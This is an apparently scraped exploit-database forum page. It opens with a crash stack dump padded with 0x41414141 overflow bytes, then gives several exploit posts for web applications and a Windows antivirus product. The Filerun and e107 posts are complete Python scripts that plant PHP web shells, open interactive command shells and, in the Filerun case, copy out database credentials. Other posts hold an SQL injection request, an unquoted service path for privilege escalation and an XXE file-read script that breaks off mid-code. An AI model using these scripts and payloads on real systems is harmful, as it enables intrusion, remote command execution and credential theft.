41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 0x41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0x41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 0x41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 0x41414141`41414141 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 0x20027f 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000 MSVCR90!pow+0x4e0
  5. ISHACK AI BOT

    Simple Attendance System 1.0 - Unauthenticated Blind SQLi

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Simple Attendance System 1.0 - Unauthenticated Blind SQLi # Exploit Author: ()t/\/\1 # Date: September 21, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html # Tested on: Linux # Version: v1.0 # Exploit Description: The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'employee_code' POST parameter in 'http://127.0.0.1//attendance/Actions.php?a=save_attendance' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data. # PoC request POST /attendance/Actions.php?a=save_attendance HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/attendance/attendance.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 138 Connection: close Cookie: PHPSESSID=11c4e96bb334b51540f4758e9d33885d employee_code=2d'+OR+SUBSTR((select+user_id+from+user_list+where+username="admin"),1,1)="1"--&att_type_id=1&date_created=&att_type=Time+In
  6. ISHACK AI BOT

    TotalAV 5.15.69 - Unquoted Service Path

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: TotalAV 5.15.69 - Unquoted Service Path # Date: 22/09/2021 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.totalav.com # Software Link: https://download.totalav.com/windows/beta-trial or https://install.protected.net/windows/cdn3/5.15.69/TotalAV.exe # Version: 5.15.69 # Tested on: Windows 10 Pro 20H2 and 21H1 x64 The PC Security Management Service, PC Security Management Monitoring Service, and Anti-Malware SDK Protected Service services from TotalAV version 5.15.69 are affected by unquoted service path (CWE-428) vulnerability which may allow a user to gain SYSTEM privileges since they all running with higher privileges. To exploit the vulnerability is possible to place executable(s) following the path of the unquoted string. Affected excecutables services: SecurityService, SecurityServiceMonitor, AMSProtectedService: PC Security Management Service SecurityService C:\Program Files (x86)\TotalAV\SecurityService.exe Auto PC Security Management Monitoring Service SecurityServiceMonitor C:\Program Files (x86)\TotalAV\SecurityService.exe --monitor Auto Anti-Malware SDK Protected Service AMSProtectedService C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe Auto C:\Users\user>sc qc SecurityService [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: SecurityService TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files(x86)\TotalAV\SecurityService.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : PC Security Management Service DIPENDENZE : SERVICE_START_NAME : LocalSystem C:\Users\user>sc qc SecurityServiceMonitor [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: SecurityServiceMonitor TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files(x86)\TotalAV\SecurityService.exe --monitor GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : PC Security Management Monitoring Service DIPENDENZE : SERVICE_START_NAME : LocalSystem C:\Users\user>sc qc AMSProtectedService [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: AMSProtectedService TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : Anti-Malware SDK Protected Service DIPENDENZE : SERVICE_START_NAME : LocalSystem
  7. ISHACK AI BOT

    Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated) # Date: 09/21/2021 # Exploit Author: syntegris information solutions GmbH # Credits: Christian P. # Vendor Homepage: https://filerun.com # Software Link: https://f.afian.se/wl/?id=SkPwYC8dOcMIDWohmyjOqAgdqhRqCZ3X&fmode=download&recipient=d3d3LmZpbGVydW4uY29t # Version: 2021.03.26 # Tested on: official docker image # PoC for exploiting a chain of a stored XSS and authenticated Remote Code Execution import requests import time import sys # this is the plain version of the payload below """ var xmlhttp = new XMLHttpRequest(); var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick' var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>' > shell.php #"; xmlhttp.onreadystatechange = function() { if (xmlhttp.readyState == XMLHttpRequest.DONE) { if (xmlhttp.status == 200) { console.log(xmlhttp.responseText); } } }; xmlhttp.open("POST", url, true); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp.send("mode=exec&path=convert|"+payload); """ if not len(sys.argv) == 2: print("missing target url") sys.exit(1) target = sys.argv[1] def inject_code(): payload = "&#x76;&#x61;&#x72;&#x20;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x20;&#x3d;&#x20;&#x6e;&#x65;&#x77;&#x20;&#x58;&#x4d;&#x4c;&#x48;&#x74;&#x74;&#x70;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x28;&#x29;&#x3b;&#x0a;&#x76;&#x61;&#x72;&#x20;&#x75;&#x72;&#x6c;&#x20;&#x3d;&#x20;&#x27;&#x2f;&#x3f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x3d;&#x63;&#x70;&#x61;&#x6e;&#x65;&#x6c;&&#x73;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x73;&#x65;&#x74;&#x74;&#x69;&#x6e;&#x67;&#x73;&&#x70;&#x61;&#x67;&#x65;&#x3d;&#x69;&#x6d;&#x61;&#x67;&#x65;&#x5f;&#x70;&#x72;&#x65;&#x76;&#x69;&#x65;&#x77;&&#x61;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x63;&#x68;&#x65;&#x63;&#x6b;&#x49;&#x6d;&#x61;&#x67;&#x65;&#x4d;&#x61;&#x67;&#x69;&#x63;&#x6b;&#x27;&#x0a;&#x76;&#x61;&#x72;&#x20;&#x70;&#x61;&#x79;&#x6c;&#x6f;&#x61;&#x64;&#x20;&#x3d;&#x20;"&#x65;&#x63;&#x68;&#x6f;&#x20;&#x27;<&#x3f;&#x70;&#x68;&#x70;&#x20;&#x65;&#x63;&#x68;&#x6f;&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x5f;&#x65;&#x78;&#x65;&#x63;&#x28;&#x24;&#x5f;&#x52;&#x45;&#x51;&#x55;&#x45;&#x53;&#x54;&#x5b;&#x5c;&#x27;&#x63;&#x6d;&#x64;&#x5c;&#x27;&#x5d;&#x29;&#x3b;&#x20;&#x3f;>&#x27;&#x20;&#x20;>&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x2e;&#x70;&#x68;&#x70;&#x20;&#x23;"&#x3b;&#x0a;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x6f;&#x6e;&#x72;&#x65;&#x61;&#x64;&#x79;&#x73;&#x74;&#x61;&#x74;&#x65;&#x63;&#x68;&#x61;&#x6e;&#x67;&#x65;&#x20;&#x3d;&#x20;&#x66;&#x75;&#x6e;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x28;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x72;&#x65;&#x61;&#x64;&#x79;&#x53;&#x74;&#x61;&#x74;&#x65;&#x20;&#x3d;&#x3d;&#x20;&#x58;&#x4d;&#x4c;&#x48;&#x74;&#x74;&#x70;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x2e;&#x44;&#x4f;&#x4e;&#x45;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x3d;&#x3d;&#x20;&#x32;&#x30;&#x30;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x20;&#x63;&#x6f;&#x6e;&#x73;&#x6f;&#x6c;&#x65;&#x2e;&#x6c;&#x6f;&#x67;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x72;&#x65;&#x73;&#x70;&#x6f;&#x6e;&#x73;&#x65;&#x54;&#x65;&#x78;&#x74;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x3d;&#x3d;&#x20;&#x34;&#x30;&#x30;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x54;&#x68;&#x65;&#x72;&#x65;&#x20;&#x77;&#x61;&#x73;&#x20;&#x61;&#x6e;&#x20;&#x65;&#x72;&#x72;&#x6f;&#x72;&#x20;&#x34;&#x30;&#x30;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x20;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x73;&#x6f;&#x6d;&#x65;&#x74;&#x68;&#x69;&#x6e;&#x67;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x6f;&#x74;&#x68;&#x65;&#x72;&#x20;&#x74;&#x68;&#x61;&#x6e;&#x20;&#x32;&#x30;&#x30;&#x20;&#x77;&#x61;&#x73;&#x20;&#x72;&#x65;&#x74;&#x75;&#x72;&#x6e;&#x65;&#x64;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x7d;&#x0a;&#x7d;&#x3b;&#x0a;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x6f;&#x70;&#x65;&#x6e;&#x28;"&#x50;&#x4f;&#x53;&#x54;"&#x2c;&#x20;&#x75;&#x72;&#x6c;&#x2c;&#x20;&#x74;&#x72;&#x75;&#x65;&#x29;&#x3b;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x65;&#x74;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x48;&#x65;&#x61;&#x64;&#x65;&#x72;&#x28;"&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x2d;&#x54;&#x79;&#x70;&#x65;"&#x2c;&#x20;"&#x61;&#x70;&#x70;&#x6c;&#x69;&#x63;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x2f;&#x78;&#x2d;&#x77;&#x77;&#x77;&#x2d;&#x66;&#x6f;&#x72;&#x6d;&#x2d;&#x75;&#x72;&#x6c;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x64;"&#x29;&#x3b;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x65;&#x6e;&#x64;&#x28;"&#x6d;&#x6f;&#x64;&#x65;&#x3d;&#x65;&#x78;&#x65;&#x63;&&#x70;&#x61;&#x74;&#x68;&#x3d;&#x63;&#x6f;&#x6e;&#x76;&#x65;&#x72;&#x74;&#x7c;"&#x2b;&#x70;&#x61;&#x79;&#x6c;&#x6f;&#x61;&#x64;&#x29;&#x3b;&#x0a;" req = requests.post( "%s/?module=fileman&page=login&action=login" % target, data={'username': 'nonexistend', 'password': 'wrong', 'otp':'', 'two_step_secret':'','language':''}, headers={'X-Forwarded-For': '<img src="/asdasdasd" onerror=%s >' % payload} ) def check_shell_exists(): req = requests.get("%s/shell.php" % target) if req.status_code != 200: return False return True def process_command(command): req = requests.get("%s/shell.php?cmd=%s" % (target, command)) print(req.text) while True: print("Injecting new log message...") inject_code() time.sleep(10) if check_shell_exists(): print("Shell exists under '%s/shell.php?cmd=ls'" % target) break print("Lets get autoconfig.php which contains database credentials...") process_command("cp system/data/autoconfig.php js/autoconfig.txt") ac_resp = requests.get("%s/js/autoconfig.txt" % target) with open("filerun.autoconfig.php", "wb") as ac_f: ac_f.write(ac_resp.content) process_command("rm js/autoconfig.php") while True: command = input("Command:") process_command(command)
  8. ISHACK AI BOT

    e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated) # Date: 21-09-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 2.3.0 # Category: Webapps # Tested on: Linux/Windows # e107 is a free website content management system # Includes an endpoint that allows remote access # Theme page is misconfigured, causing security vulnerability # User information with sufficient permissions is required. # The contents of the upload "malicious.zip" file must be too long to read to bypass some security measures! # Example: python3 exploit.py -u http://example.com -l admin -p Admin123 # python3 exploit.py -h from time import sleep import requests import argparse def main(): parser = argparse.ArgumentParser( description='e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)' ) parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\ne107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") host(args) def host(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") sleep(2) args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass else: print("\n[?] Check Adress...\n") sleep(2) args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass # Check Host Status try: response = requests.get(args.host) if response.status_code != 200: print("[-] Address not reachable!") sleep(2) exit(1) else: check(args) except requests.ConnectionError as exception: print("[-] Address not reachable!") sleep(2) exit(1) def check(args): response = requests.get(args.host + "/e107_themes/payload/payload.php?cmd=whoami") if response.status_code == 200: print("[*] Exploit File Exists!\n") sleep(2) exploit(args) else: login(args) def login(args): url = args.host + "/e107_admin/admin.php" headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/e107_admin/admin.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = {"authname": args.login, "authpass": args.password, "authsubmit": "Log In"} response = requests.post(url, headers=headers, data=data, allow_redirects=False) new_cookie = response.cookies.get("MySi_cookieSID") if (response.headers.get("Location") == "admin.php?failed"): print("[-] Login Failed...\n") print("Your username or password is incorrect.") sleep(2) exit(1) else: print("[+] Success Login...\n") sleep(2) install(args, new_cookie) def install(args, new_cookie): url = args.host + "/e107_admin/theme.php" cookies = { "MySi_cookieSID": new_cookie, "e107_tzOffset": "-180"} headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/e107_admin/theme.php?mode=main&action=upload", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = "------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n2097152\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"ac\"\r\n\r\n005cd2159fa5342883b18a46726a908d\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"file_userfile[]\"; filename=\"payload.zip\"\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00payload/PK\x03\x04\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00\x00\x00payload/payload.php\xb3\xb1/\xc8(P\xc8L\xd3\xc8,.N-\xd1P\x89ww\r\x89VO\xceMQ\x8f\xd5\xd4\xacVP\x01\xb2\x14l\x15P\xc5\xad\x15\x8a+\x8bKRs5@\xb2@^Jf\xaa\xb5B\xad\x82\xbd\x1d\x00PK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00payload/\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xaf\x9b\xc4\xe5\xae\xd7\x01\x80E4\xc5\xe5\xae\xd7\x01\x00\xaf\x9b\xc4\xe5\xae\xd7\x01PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81&\x00\x00\x00payload/payload.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x80/\x99\xe6\xed\xae\xd7\x01\x008\xa1x\xee\xae\xd7\x01\x80/\x99\xe6\xed\xae\xd7\x01PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xbf\x00\x00\x00\x95\x00\x00\x00\x00\x00\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\n1\r\n------WebKitFormBoundary--\r\n" response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) if (response.status_code == 301): print("[!] Unauthorized user!\n\n") print("Requires user with add theme permissions.") sleep(2) exit(1) else: print("[!] Upload Vuln File!\n") sleep(2) exploit(args) def exploit(args): print("[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + "/e107_themes/payload/payload.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()
  9. ISHACK AI BOT

    OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE) # Date: 2021-09-20 # Exploit Author: Jake Ruston # Vendor Homepage: https://opencats.org # Software Link: https://github.com/opencats/OpenCATS/releases/download/0.9.4-2/opencats-0.9.4-2-full.zip # Version: < 0.9.4-3 # Tested on: Linux # CVE: 2019-13358 from argparse import ArgumentParser from docx import Document from zipfile import ZipFile from base64 import b64decode import requests import re xml = """ <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <!DOCTYPE root [<!ENTITY file SYSTEM 'php://filter/convert.base64-encode/resource={}'>]> <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"> <w:body> <w:p> <w:r> <w:t>START&file;END</w:t> </w:r> </w:p> <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616"> <w:pgSz w:w="12240" w:h="15840"/> <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/> <w:cols w:space="720"/> <w:docGrid w:linePitch="360"/> </w:sectPr> </w:body> </w:document> """ class CVE_2019_13358: def __init__(self): self.args = self.parse_arguments() def parse_arguments(self): parser = ArgumentParser() required = parser.add_argument_group("required arguments") required.add_argument("--url", help="the URL where OpenCATS is hosted", required=True) required.add_argument("--file", help="the remote file to read", required=True) args = parser.parse_args() if not args.url.startswith("http"): args.url = f"http://{args.url}" args.url = f"{args.url}/careers/index.php" return args def create_resume(self): document = Document() document.add_paragraph() document.save("resume.docx") def update_resume(self): with ZipFile("resume.docx", "r") as resume: resume.extractall() with open("word/document.xml", "w") as document: document.write(xml.format(self.args.file).strip()) with ZipFile("resume.docx", "w") as resume: resume.write("word/document.xml") def get(self): params = { "m": "careers", "p": "showAll" } try: request = requests.get(self.args.url, params=params) except Exception as e: raise Exception("Failed to GET to the URL provided", e) id = re.search(r"ID=([0-9])*", request.text) if id is None: raise Exception("No vacancies were found") return id.group(1) def post(self, id): params = { "m": "careers", "p": "onApplyToJobOrder" } files = { "ID": (None, id), "candidateID": (None, -1), "applyToJobSubAction": (None, "resumeLoad"), "file": (None, ""), "resumeFile": open("resume.docx", "rb"), "resumeContents": (None, ""), "firstName": (None, ""), "lastName": (None, ""), "email": (None, ""), "emailconfirm": (None, ""), "phoneHome": (None, ""), "phoneCell": (None, ""), "phone": (None, ""), "bestTimeToCall": (None, ""), "address": (None, ""), "city": (None, ""), "state": (None, ""), "zip": (None, ""), "keySkills": (None, "") } try: request = requests.post(self.args.url, params=params, files=files) except Exception as e: raise 